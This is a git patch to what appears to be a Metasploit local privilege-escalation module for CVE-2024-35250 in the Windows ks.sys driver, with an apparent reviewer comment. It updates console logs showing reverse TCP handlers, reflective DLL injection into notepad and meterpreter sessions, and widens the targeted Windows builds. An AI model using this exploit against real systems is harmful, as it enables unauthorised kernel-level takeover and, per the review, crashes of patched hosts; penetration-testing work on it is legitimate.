From 81b83f2fd6b274c44f584c281d8ad150713897c7 Mon Sep 17 00:00:00 2001
From: Jack Heysel
Date: Wed, 6 Nov 2024 09:13:51 -0800
Subject: [PATCH] Updated docs and check
---
 .../windows/local/cve_2024_35250_ks_driver.md | 16 ++++++----------
 .../windows/local/cve_2024_35250_ks_driver.rb | 2 +-
 2 files changed, 7 insertions(+), 11 deletions(-)
diff --git a/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md b/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md
index a897526320f9..8773054e66a3 100644
--- a/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md
+++ b/documentation/modules/exploit/windows/local/cve_2024_35250_ks_driver.md
@@ -56,10 +56,8 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
 [*] Reloading module...
 [*] Started reverse TCP handler on 192.168.123.1:5555
-[!] SESSION may not be compatible with this module:
-[!] * incompatible session type: meterpreter. This module works with: .
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 19045
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 1012
@@ -85,7 +83,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 [*] Started reverse TCP handler on 192.168.123.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows 10+ Build 14393
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 14393
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 4272
@@ -111,11 +109,9 @@ meterpreter >
 msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 [*] Started reverse TCP handler on 192.168.123.1:5555
-[!] SESSION may not be compatible with this module:
-[!] * incompatible session type: meterpreter. This module works with: .
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable.
-[*] Launching notepad to host the exploit...
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows 10+ Build 22621
+[*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 6948
 [*] Reflectively injecting the DLL into 6948...
@@ -142,7 +138,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > rexploit
 [*] Started reverse TCP handler on 172.16.199.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 20348
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 20348
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 7336
@@ -169,7 +165,7 @@ msf6 exploit(windows/local/cve_2024_35250_ks_driver) > run
 [*] Started reverse TCP handler on 172.16.199.1:5555
 [*] Running automatic check ("set AutoCheck false" to disable)
-[+] The target appears to be vulnerable. Version detected: Windows Server 2016+ Build 14393
+[+] The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2016+ Build 14393
 [*] Launching notepad to host the exploit...
 [*] The notepad path is: C:\Windows\System32\notepad.exe
 [*] The notepad pid is: 316
diff --git a/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb b/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb
index 8c316f4767ec..20201e968228 100644
--- a/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb
+++ b/modules/exploits/windows/local/cve_2024_35250_ks_driver.rb
@@ -69,7 +69,7 @@ def target_compatible?(version)
 vprint_status("Windows Build Number = #{version.build_number}")
 return true if version.build_number.between?(Msf::WindowsVersion::Win10_1607, Msf::WindowsVersion::Win10_22H2)
- return true if version.build_number == Msf::WindowsVersion::Win11_21H2
+ return true if version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Win11_22H2
 return true if version.build_number.between?(Msf::WindowsVersion::Server2016, Msf::WindowsVersion::Server2022)
 false
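Review bot: target_compatible? still gates on build_number alone, so after this change a Windows 11 22H2 host (build 22621) that has the June 2024 or a later cumulative update installed — which raises only the revision/UBR, not the build — is still reported as appearing vulnerable and the module goes on to inject the DLL and fire a kernel exploit against a patched ks.sys, where failure is more likely a bugcheck than a clean error; the same limitation applies to the Win10 and Server ranges on the lines above and below the changed one. Unless a revision comparison happens elsewhere in the module, consider comparing the revision against the first fixed revision for each build inside this method, and at minimum document the limitation above the changed line: `# NOTE: build-level gate only; a patched host at the same build number passes this check`. Stylistically the new `||` line is long and will grow with every release added; `return true if [Msf::WindowsVersion::Win11_21H2, Msf::WindowsVersion::Win11_22H2].include?(version.build_number)` keeps the accepted builds in one list. The method's opening `def` is only visible as the hunk's header context and its closing `end` falls outside the lines shown.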